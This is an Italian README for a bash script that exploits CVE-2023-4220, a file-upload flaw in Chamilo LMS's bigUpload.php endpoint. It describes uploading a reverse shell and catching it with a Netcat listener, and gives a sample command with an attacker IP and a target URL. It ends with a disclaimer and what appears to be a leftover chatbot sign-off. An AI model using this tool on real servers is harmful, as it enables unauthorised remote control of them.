
Refurbish Chamilo LMS CVE-2023-4220 exploit scritto in bash
Questo script sfrutta una vulnerabilità di esecuzione di codice remoto (RCE) in Chamilo LMS versione ≤ v1.11.24. La vulnerabilità (CVE-2023-4220) esiste a causa di una funzionalità di caricamento file senza restrizioni nell'endpoint bigUpload.php di Chamilo LMS, che consente agli attaccanti di caricare file arbitrari (come shell web) ed eseguirli, portando a una completa esecuzione di codice remoto sul server.
Questo script è stato migliorato da Divine Clown per semplificare il processo di sfruttamento: genera automaticamente un file di reverse shell, lo carica sul target e avvia un listener per dare all'attaccante accesso diretto alla shell.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php../CVE-2023-4220.sh -i <ip_attaccante> -p <porta> -h <link_host>
-i <ip_attaccante>: Indirizzo IP dell'attaccante per la reverse shell.-p <porta>: Porta su cui verrà avviato il listener Netcat.-h <link_host>: URL completo dell'istanza vulnerabile di Chamilo LMS../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
Questo strumento è destinato esclusivamente a scopi educativi e ad ambienti di test in cui si dispone dell'autorizzazione esplicita per sfruttare vulnerabilità. L'accesso non autorizzato ai sistemi è illegale e può comportare conseguenze penali. Gli autori non saranno ritenuti responsabili per qualsiasi uso improprio o danno causato da questo script.
Sentiti libero di modificare ulteriormente il README se desideri includere informazioni aggiuntive o formattazione! Fammi sapere se hai bisogno di altro.